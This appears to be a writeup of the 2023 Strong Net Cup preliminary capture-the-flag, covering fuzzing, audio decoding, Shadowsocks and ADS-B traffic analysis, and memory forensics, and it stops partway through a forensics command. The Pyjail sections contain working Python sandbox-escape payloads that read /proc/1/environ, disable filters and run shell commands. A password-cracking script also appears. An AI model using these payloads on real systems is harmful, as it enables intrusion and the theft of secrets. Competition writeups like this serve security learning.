
Title: The 7th Strong Net Cup Preliminary Competition in 2023 WP

MISC

easyfuzz

1. Trying a few input strings shows that the program checks 9 input characters; when every character is correct the returned value is all 1s (1111111111) and the flag is given.

Further guessing and testing shows that the first two characters can be anything and already give 110000000, so only the last seven characters need to be brute-forced.

2. Brute-force one position at a time to verify the idea: the last character is 'd'.

3. Write a brute-force script. It sends 9-character strings and prints every input whose response is not "Here is your code coverage: 110000000". The script is as follows:

    from pwn import *
    from string import printable

    conn = remote('101.200.122.251', 12199)
    non_matching_strings = []

    # Vary one position at a time, keeping the other eight characters as 'a'
    for i in range(9):
        for char in printable:
            payload = 'a'*i + char + 'a'*(8-i)
            print(conn.recvuntil(b'Enter a string (should be less than 10 bytes):'))
            conn.sendline(payload.encode())
            response = conn.recvline().decode().strip()
            # Record every input whose coverage differs from the baseline
            if response != 'Here is your code coverage: 110000000':
                non_matching_strings.append(payload)

    for string in non_matching_strings:
        print(string)

FLAG: qwb{YouKnowHowToFuzz!}
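The reason this challenge falls so quickly is that the coverage string leaks one bit per input position. The block below is an added example, not code from the writeup or the challenge: `oracle` is a local stand-in whose behaviour is assumed from the observations above, and `SECRET` is a constructed value.

```python
# Added example: a local stand-in for the coverage oracle and a per-position solver.
from string import printable

# Whitespace is skipped: a newline inside the payload would end the input line early.
CANDIDATES = [c for c in printable if not c.isspace()]
SECRET = "zzK3y!Abd"  # constructed 9-character secret, not the challenge's real string

def oracle(s, secret=SECRET):
    """Assumed service behaviour: one coverage bit per position, first two always set."""
    if len(s) != len(secret):
        return "0" * len(secret)
    return "".join("1" if i < 2 or s[i] == secret[i] else "0" for i in range(len(secret)))

def recover(query, length=9):
    """Fix one position at a time, keeping a candidate once its coverage bit turns to 1."""
    known = ["a"] * length
    queries = 0
    for i in range(length):
        for c in CANDIDATES:
            known[i] = c
            queries += 1
            if query("".join(known))[i] == "1":
                break
        else:
            raise ValueError(f"no candidate sets coverage bit {i}")
    return "".join(known), queries

if __name__ == "__main__":
    found, used = recover(oracle)
    print(found, used, "queries; exhaustive search would need", len(CANDIDATES) ** 7)
```

With per-position feedback the work grows linearly with the length of the string instead of exponentially, which is why returning fine-grained comparison state to an untrusted client is a leak.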

Sign in

flag{welcome_to_qwb_2023}

Pyjail ! It's myFILTER !!!

Python sandbox escape: after closing the string, open() directly reads the environment to get the flag.

{13212}'+(print(open('/proc/1/environ').read()))+'

Or use payload:

{print(open('/proc/1/environ').read())}

flag{61e81b4f-566c-49f5-84dd-d79319fddc82}

Pyjail ! It's myRevenge !!!

Python sandbox escape

Write a file containing import os;os.system("nl fl*hzy"), then use read to read the command's output and get the flag.

All filtered characters are bypassed with octal escapes, and the file is written in segments.

{13212}'+(open('wsy', 'a').write('151155160157162'))+'{13212}'+(open('wsy', 'a').write('t 157'))+'{13212}'+(open('wsy', 'a').write('163;157'))+'{13212}'+(open('wsy', 'a').write('163.'))+'{13212}'+(open('wsy', 'a').write('163y'))+'{13212}'+(open('wsy', 'a').write('st'))+'{13212}'+(open('wsy', 'a').write('em('nl 146*hzy')'))+'{13212}'+open('143157de.py','w').write(open('wsy').read())+'{13212}'+(print(open('hzy').read()))+'

Or execute the following PoC payloads in turn:

{globals().update(dict(my_filter=lambda x:1))}''{in''put()}'#

{globals().update(dict(len=lambda x:0))}''{in''put()}'#

{print(''.__class__.__mro__[1].__subclasses__()[137].__init__.__globals__['__builtins__']['__import__']('os').listdir())}

['flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104', 'server_8F6C72124774022B.py']

{globals().update(dict(my_filter=lambda x:1))}''{in''put()}'#

{globals().update(dict(len=lambda x:0))}''{in''put()}'#

{print(open('flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104').read())}


flag{8f0a4ac2-52d3-4adb-a1a3-47e05997817d}

Wabby Wabbo Radio

F12 reveals the link to wav/static/audios/xh4.wav

Refreshing the page shows that the file to play is selected at random.

Fuzzing the file names finds xh1-xh5, hint1-hint2 and flag.wav in total.

The left channel of each wav is clearly Morse code.

Separate the channel, increase the amplitude, and decode it on an online website:

https://morsecode.world/international/decoder/audio-decoder-adaptive.html

Result:

Do you want a flag? Let's listen a little longer.
Genshin Impact starts.
The weather is really nice today. It's a great day to listen to the Wabby Wabbo radio.
If you don't know how to do it, you can go ahead and do something else first.
may be flag is png picture
do you know QAM?

The rest is not useful; only one message is a hint, pointing at QAM carrier amplitude.

https://info.support.huawei.com/info-finder/encyclopedia/zh/QAM.html#Qam's horoscope

After a brief read, I found that 0 and 1 can be distinguished by amplitude. I tried printing the amplitudes and found that they all happened to be concentrated between ±1 and ±3.

Comparing with the 16QAM constellation diagram, the amplitudes map neatly onto symbols, but we don't know the specific mapping, so we simply guess an assignment in ascending order.

The simple script is as follows:

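    import scipy.io.wavfile as wav
    import numpy as np
    import sys

    sample_rate, data = wav.read('flag.wav')
    # Dump the raw (left, right) samples to inspect the amplitude levels
    for i in data:
        print(i)

    flag = ''

    def repla(n):
        # Guessed mapping: the four amplitude levels in ascending order
        if n == -3:
            return '00'
        elif n == -1:
            return '01'
        elif n == 1:
            return '10'
        elif n == 3:
            return '11'

    # Each stereo sample carries two levels, i.e. four bits
    for x, y in data:
        n1 = round(float(x))
        n2 = round(float(y))
        flag += repla(n1)
        flag += repla(n2)

    print(flag)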
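The script above stops at a bit string and relies on a guessed mapping. The block below is an added example, not part of the original writeup: it goes one step further by trying all 24 level-to-bits assignments and keeping the ones whose output starts with the PNG signature (the hint says the flag may be a PNG). The `encode` helper and the sample signal are constructed for the demonstration.

```python
# Added example: recover the level-to-bits mapping for amplitude-coded 16QAM samples.
from itertools import permutations

LEVELS = (-3, -1, 1, 3)                       # amplitudes observed in the writeup
PNG_MAGIC = bytes.fromhex("89504e470d0a1a0a")

def quantize(v):
    """Snap a noisy sample to the nearest constellation level."""
    return min(LEVELS, key=lambda lv: abs(lv - v))

def decode(samples, mapping):
    """samples: (left, right) pairs; mapping: level -> 2-bit string."""
    bits = "".join(mapping[quantize(l)] + mapping[quantize(r)] for l, r in samples)
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))

def find_mapping(samples, magic=PNG_MAGIC):
    """Try every assignment of 2-bit groups to levels; keep those that yield the magic."""
    hits = []
    for perm in permutations(("00", "01", "10", "11")):
        mapping = dict(zip(LEVELS, perm))
        if decode(samples, mapping).startswith(magic):
            hits.append(mapping)
    return hits

def encode(data, mapping, jitter=0.2):
    """Constructed test signal: inverse of decode() with a small alternating offset."""
    inv = {b: lv for lv, b in mapping.items()}
    bits = "".join(f"{byte:08b}" for byte in data)
    levels = [inv[bits[i:i + 2]] + jitter * (-1) ** (i // 2) for i in range(0, len(bits), 2)]
    return list(zip(levels[0::2], levels[1::2]))

if __name__ == "__main__":
    ascending = dict(zip(LEVELS, ("00", "01", "10", "11")))   # the writeup's guess
    samples = encode(PNG_MAGIC + b"constructed sample", ascending)
    print(find_mapping(samples))
```

Because the PNG signature contains all four 2-bit groups, exactly one mapping survives, so the check replaces the blind guess with a verified one.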


Spy Shadows 3.0

Hint given: a paper airplane is also an airplane, and can also fly abroad to the other side of the ocean. From the challenge description, the special tunnel is easily associated with a VPN.

A little searching leads to Shadowsocks; reference article:

https://phuker.github.io/posts/Shadowsks-active-probing.html

The complete decryption script was given, but I didn't know the key, so I just brute-forced it and used HTTP as the marker of a successful request.

    #!/usr/bin/env python3
    # encoding: utf-8
    import os
    import sys
    import logging
    import hashlib
    from Crypto.Cipher import AES

    logging.basicConfig(level=logging.INFO)

    def EVP_BytesToKey(password, key_len, iv_len):
        # MD5-based key derivation: keep hashing until enough bytes are produced
        m = []
        i = 0
        while len(b''.join(m)) < (key_len + iv_len):
            md5 = hashlib.md5()
            data = password
            if i > 0:
                data = m[i - 1] + password
            md5.update(data)
            m.append(md5.digest())
            i += 1
        ms = b''.join(m)
        key = ms[:key_len]
        iv = ms[key_len:key_len + iv_len]
        return key, iv

    def decrypt(cipher, password):
        key_len = int(256/8)
        iv_len = 16
        mode = AES.MODE_CFB
        key, _ = EVP_BytesToKey(password, key_len, iv_len)
        cipher = bytes.fromhex(cipher)
        # The first 16 bytes of the stream are the IV
        iv = cipher[:iv_len]
        real_cipher = cipher[iv_len:]
        obj = AES.new(key, mode, iv, segment_size=128)
        plain = obj.decrypt(real_cipher)
        return plain

    def main():
        # test http request
        cipher = 'e0a77dfafb6948728ef45033116b34fc855e7ac8570caed829ca9b4c32c2f6f79184e333445c6027e18a6b53253dca03c6c464b8289cb7a16aa1766e6a0325ee842f9a766b81039fe50c5da12dfaa89eacce17b1 1ba9748899b49b071851040245fa5ea1312180def3d7c0f5af6973433544a8a342e8fcd2b1759086ead124e39a8b3e2f6dc5d56ad7e8548569eae98ec363f87930d4af80e984d0103036a91be4ad76f0cfb00206'
        with open('rockyou.txt', 'rb') as f:
            lines = f.readlines()
        # Try each candidate password and keep the ones whose plaintext looks like HTTP
        for password in lines:
            plain = decrypt(cipher, password.strip())
            if b'HTTP' in plain:
                print(password, plain)

    if __name__ == '__main__':
        main()

    #b'superman\n' b'\x03\x0f192.168.159.131\x00PGET /Why-do-you-want-to-know-what-this-is HTTP/1.1\r\nHost: 192.168.159.131\r\nUser-Agent: curl/8.4.0\r\nAccept: */*\r\nConnection: close\r\n\r\n'

Get the file name Why-do-you-want-to-know-what-this-is, and get flag after md5

flag{dc7e57298e65949102c17596f1934a97}
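The decrypted output above begins with the Shadowsocks target-address header (`\x03\x0f192.168.159.131\x00P`) before the HTTP request. The block below is an added example, not from the writeup or the referenced article: it parses that header, which is a stricter test of a correct decryption than looking for the substring "HTTP", and extracts the request path. The function names are hypothetical.

```python
# Added example: structural check of a decrypted Shadowsocks request.
import ipaddress
import struct

# Plaintext printed by the brute-force run above (copied from the page).
PLAIN = (b"\x03\x0f192.168.159.131\x00PGET /Why-do-you-want-to-know-what-this-is HTTP/1.1\r\n"
         b"Host: 192.168.159.131\r\nUser-Agent: curl/8.4.0\r\nAccept: */*\r\n"
         b"Connection: close\r\n\r\n")

def parse_ss_request(plain):
    """Split [atyp][address][port][payload]; raise ValueError on a malformed header."""
    if len(plain) < 1:
        raise ValueError("empty plaintext")
    atyp = plain[0]
    if atyp == 0x01:                                   # IPv4: 4 raw bytes
        end = 5
        host = plain[1:end]
    elif atyp == 0x04:                                 # IPv6: 16 raw bytes
        end = 17
        host = plain[1:end]
    elif atyp == 0x03 and len(plain) >= 2:             # hostname: length byte + name
        end = 2 + plain[1]
        host = plain[2:end]
    else:
        raise ValueError("unknown address type 0x%02x" % atyp)
    if len(plain) < end + 2 or not host:
        raise ValueError("truncated header")
    if atyp == 0x03:
        if not all(0x21 <= b < 0x7f for b in host):    # printable ASCII only
            raise ValueError("non-printable hostname")
        host = host.decode("ascii")
    else:
        host = str(ipaddress.ip_address(host))
    (port,) = struct.unpack(">H", plain[end:end + 2])  # big-endian port
    return host, port, plain[end + 2:]

def request_path(payload):
    """Return the path from an HTTP request line such as b'GET /x HTTP/1.1'."""
    method, target, version = payload.split(b"\r\n", 1)[0].split(b" ")
    return target.lstrip(b"/").decode("ascii")

if __name__ == "__main__":
    host, port, payload = parse_ss_request(PLAIN)
    print(host, port, request_path(payload))
```

The recovery works offline because this legacy stream-cipher mode derives the key from the password with unsalted MD5 and carries no integrity tag, so a single captured request is enough to test candidate passwords.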

Spy Shadows 2.0

From the challenge description, aircraft traffic is easily associated with the ADS-B protocol.

Export the TCP stream data:

tshark -r attach.pcapng -Y 'tcp' -T fields -e tcp.segment_data > tcp.txt

Parsing script:

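    import pyModeS

    with open('tcp.txt', 'r') as f:
        lines = f.readlines()

    for data in lines:
        # 46 hex characters plus the newline; the ADS-B message follows an 18-character prefix
        if len(data) == 47:
            print(pyModeS.decoder.tell(data[18:].strip()))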

Filter for Airborne velocity messages: the fastest airplane, 79a05e, flies at 371 knots, and the MD5 of its ICAO address is the flag.

Or:

Export the packets to JSON format

Extract the fields with a script and compute the MD5:

    import json
    import pyModeS as pms
    import hashlib

    with open('123.json', 'r', encoding='utf-8') as file:
        data = json.load(file)

    # Collect the TCP payload of every packet as a hex string
    info = []
    for packet in data:
        if 'layers' in packet['_source'] and 'tcp' in packet['_source']['layers']:
            tcp_layer = packet['_source']['layers']['tcp']
            if 'tcp.payload' in tcp_layer:
                tcp_payload = tcp_layer['tcp.payload'].replace(':', '')
                info.append(tcp_payload)

    planes_data = []
    for i in info:
        # Skip the 18-character prefix in front of the ADS-B message
        msg = i[18:]
        if pms.adsb.typecode(msg) >= 19 and pms.adsb.typecode(msg) <= 22:
            icao = pms.adsb.icao(msg)
            velocity_info = pms.adsb.velocity(msg)
            speed, track, vertical_rate, _ = velocity_info
            plane_info = {'icao': icao, 'speed': speed, 'track': track, 'vertical_rate': vertical_rate}
            planes_data.append(plane_info)

    # The flag is the MD5 of the fastest aircraft's ICAO address in upper case
    fastest_plane = max(planes_data, key=lambda x: x['speed'])
    print(hashlib.md5(fastest_plane['icao'].upper().encode()).hexdigest())
    #flag{4cf6729b9bc05686a79c1620b0b1967b}
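Both scripts above rely on pyModeS for the velocity field. The block below is an added example, not from the writeup: it decodes the airborne velocity message by hand to show where the speed comes from, then picks the fastest aircraft. The first sample is a reference message commonly used in Mode S decoding tutorials, the second is a constructed variant, and none of them come from the challenge capture.

```python
# Added example: hand-decoding ADS-B airborne velocity (DF17, type code 19, subtype 1/2).
import math

SAMPLES = [
    "8D485020994409940838175B26A2",  # reference velocity message from decoding tutorials
    "8DABCDEF994409B40838175B26A2",  # constructed variant (parity not recomputed)
    "8D4840D6202CC371C32CE0576098",  # identification message, must be skipped
]

def decode_velocity(hex_msg):
    """Return (icao, ground speed kt, track deg, vertical rate ft/min) or None."""
    hex_msg = hex_msg.strip()
    try:
        bits = bin(int(hex_msg, 16))[2:].zfill(112)
    except ValueError:
        return None
    if len(hex_msg) != 28 or int(bits[0:5], 2) != 17:   # 112-bit DF17 only
        return None
    me = bits[32:88]                                    # 56-bit ME field
    tc, st = int(me[0:5], 2), int(me[5:8], 2)
    if tc != 19 or st not in (1, 2):                    # ground-speed subtypes
        return None
    v_ew, v_ns = int(me[14:24], 2), int(me[25:35], 2)
    if v_ew == 0 or v_ns == 0:                          # 0 means "not available"
        return None
    scale = 4 if st == 2 else 1                         # subtype 2: supersonic, 4 kt steps
    vx = (v_ew - 1) * scale * (-1 if me[13] == "1" else 1)   # sign 1 = towards west
    vy = (v_ns - 1) * scale * (-1 if me[24] == "1" else 1)   # sign 1 = towards south
    vr = int(me[37:46], 2)
    vrate = None if vr == 0 else (vr - 1) * 64 * (-1 if me[36] == "1" else 1)
    track = math.degrees(math.atan2(vx, vy)) % 360
    return hex_msg[2:8].upper(), math.hypot(vx, vy), track, vrate

def fastest(messages):
    """Return (icao, speed) for the fastest aircraft among the velocity messages."""
    decoded = [d for d in map(decode_velocity, messages) if d]
    icao, speed, _, _ = max(decoded, key=lambda d: d[1])
    return icao, speed

if __name__ == "__main__":
    print(fastest(SAMPLES))
```

The decoder does not verify the 24-bit parity field, so it accepts the constructed message; a capture-processing tool should check parity before trusting a frame.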

happy chess

This is probably an unintended solution: enter any 9 positions and exit the round directly, and it is counted as a success.

Strong Net Pioneer

speedup

Purely a lookup problem: it asks for the digit sum of the factorial of 2 to the power of 27, and this value is available directly on OEIS

https://oeis.org/A244060/list

2023 Strong Net Cup (强网杯) writeup by Arr3stY0u

Take the SHA-256 of the value to get the flag

flag{bbdee5c548fddfc76617c562952a3a3b03d423985c095521a8661d248fad3797}

Have you found the PNG?

strings main.mem | grep 'Linux version'

After getting the kernel version, follow this guide:

https://treasure-house.randark.site/blog/2023-10-25-MemoryForensic-Test/

Make a Linux profile

python2 vol.py -f C:\Users\22826\Desktop\main.mem --profile=LinuxUbuntu2004x64 linux_find_file -L | findstr 'Desktop'

This finds a file on the desktop: have_your_fun.jocker

Tried to export it, but the result was empty

python2 vol.py -f C:\Users\22826\Desktop\main.mem --profile=Linux
